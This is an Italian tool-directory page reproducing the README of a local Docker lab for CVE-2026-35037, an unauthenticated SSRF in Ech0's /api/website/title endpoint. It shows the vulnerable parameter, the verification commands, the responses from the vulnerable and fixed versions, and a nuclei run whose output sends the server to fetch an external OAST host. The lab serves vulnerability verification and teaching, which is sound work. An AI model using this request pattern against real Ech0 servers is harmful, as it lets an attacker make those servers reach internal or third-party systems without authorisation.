Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
POC_CVE-2026-35037 — Laboratorio di riproduzione isolato locale per CVE-2026-35037, una vulnerabilità SSRF non autenticata nell'endpoint GET /api/website/title di Ech0. Include configurazione Docker Compose, script di verifica e modello nuclei per la validazione. | Kitploit
Strumenti/GitHubGitHub/fineman999/poc_cve-2026-35037
Analisi delle VulnerabilitàExploitSicurezza WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubfineman999/poc_cve-2026-35037

POC_CVE-2026-35037

Laboratorio di riproduzione isolato locale per CVE-2026-35037, una vulnerabilità SSRF non autenticata nell'endpoint GET /api/website/title di Ech0. Include configurazione Docker Compose, script di verifica e modello nuclei per la validazione.

Vedi Repository
23 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-35037 Laboratorio SSRF Ech0

Questo repository contiene un laboratorio di riproduzione locale e isolato per CVE-2026-35037, una vulnerabilità SSRF non autenticata nell'endpoint GET /api/website/title di Ech0.

Il laboratorio utilizza un server di evidenza locale controllato invece di metadati cloud o infrastruttura di terze parti.

Riepilogo

  • Prodotto: lin-snow/Ech0
  • Vulnerabilità: Server-Side Request Forgery
  • CVE: CVE-2026-35037
  • GHSA: GHSA-cqgf-f4x7-g6wc
  • Versioni affette: GHSA elenca <= 4.2.1; NVD descrive versioni precedenti a 4.2.8
  • Versione corretta: 4.2.8
  • Endpoint: GET /api/website/title
  • Parametro: website_url
  • Autenticazione: non richiesta nella versione vulnerabile
  • Riferimenti:

    • https://nvd.nist.gov/vuln/detail/CVE-2026-35037
    • https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wc

    File

    • docker-compose.yml: avvia Ech0 e un server HTTP di evidenza locale
    • Dockerfile.ech0-lab: costruisce Ech0 dal tag GitHub ufficiale
    • verify-cve-2026-35037.sh: invia la richiesta di verifica SSRF controllata
    • evidence/index.html: pagina HTML controllata con un <title> univoco
    • nuclei/CVE-2026-35037.yaml: template nuclei candidato

    Perché compilare dal sorgente?

    I tag Docker vulnerabili storici come sn0wl1n/ech0:4.2.1 non erano disponibili quando questo laboratorio è stato creato. Il laboratorio utilizza invece i tag GitHub ufficiali lin-snow/Ech0:

    • v4.2.1 per il candidato vulnerabile
    • v4.2.8 per il confronto corretto

    Il Dockerfile locale evita anche i problemi di compilazione a monte osservati con il precedente build.Dockerfile.

    Requisiti

    • Docker Engine o Docker Desktop
    • curl
    • Opzionale: nuclei

    Eseguire questo solo in un laboratorio locale isolato. Non utilizzare questi comandi contro sistemi di terze parti. Usare solo contro sistemi di cui si è proprietari o per i quali si ha esplicita autorizzazione scritta per il test.

    Riprodurre il comportamento vulnerabile

    Avviare Ech0 v4.2.1:

    root@kitploit:~
    ECH0_TAG=4.2.1 docker compose up -d --build
    

    Inviare la richiesta di verifica controllata:

    root@kitploit:~
    sh verify-cve-2026-35037.sh
    

    Risposta vulnerabile prevista:

    root@kitploit:~
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8
    
    {"code":1,"msg":"获取网站标题成功","data":"ECH0-SSRF-CVE-2026-35037"}
    

    Confermare che Ech0 ha raggiunto il server di evidenza controllato:

    root@kitploit:~
    docker compose logs evidence
    

    Registro di evidenza osservato:

    root@kitploit:~
    ech0-cve-2026-35037-evidence  | 192.168.107.3 - - [20/May/2026 03:48:51] "GET / HTTP/1.1" 200 -
    

    Confrontare la versione corretta

    Avviare Ech0 v4.2.8:

    root@kitploit:~
    docker compose down -v
    ECH0_TAG=4.2.8 docker compose up -d --build
    

    Eseguire la stessa richiesta:

    root@kitploit:~
    sh verify-cve-2026-35037.sh
    

    Risposta corretta osservata:

    root@kitploit:~
    HTTP/1.1 401 Unauthorized
    Content-Type: application/json; charset=utf-8
    
    {"code":0,"msg":"未找到令牌,请点击右上角登录","error_code":"TOKEN_MISSING","message_key":"auth.token_missing","data":null}
    

    Validazione con Nuclei

    Validare il template:

    root@kitploit:~
    nuclei -validate -t nuclei/CVE-2026-35037.yaml
    

    Eseguire contro il vulnerabile v4.2.1:

    root@kitploit:~
    nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277
    

    Risultato vulnerabile osservato:

    root@kitploit:~
    [INF] Using Interactsh Server: oast.online
    [CVE-2026-35037] [http] [high] http://127.0.0.1:6277/api/website/title?website_url=http://d86j283ea0u4jbaqj8dgo4cgc4jhn7r3f.oast.online/
    [INF] Scan completed in 6.425886625s. 1 matches found.
    

    Eseguire contro il corretto v4.2.8:

    root@kitploit:~
    nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277
    

    Risultato corretto osservato:

    root@kitploit:~
    [INF] Using Interactsh Server: oast.fun
    [INF] Scan completed in 5.974574416s. No results found.
    

    Pulizia

    root@kitploit:~
    docker compose down -v
    

    Note

    • Il laboratorio manuale utilizza http://evidence:8080/ all'interno della rete Docker Compose.
    • Il template nuclei utilizza {{interactsh-url}} e richiede il supporto OAST/interactsh.
    • Il template nuclei utilizza {{interactsh-url}}, che contatta di default i server interactsh di ProjectDiscovery come oast.online o oast.fun. Usare -iserver per sovrascrivere il server o -ni per disabilitare interactsh.
    • Il laboratorio non sonda endpoint di metadati cloud.
    • Il laboratorio non contatta destinazioni di produzione o di terze parti, ad eccezione dei normali download di dipendenze/immagini durante la compilazione Docker.
    Scarica lo strumento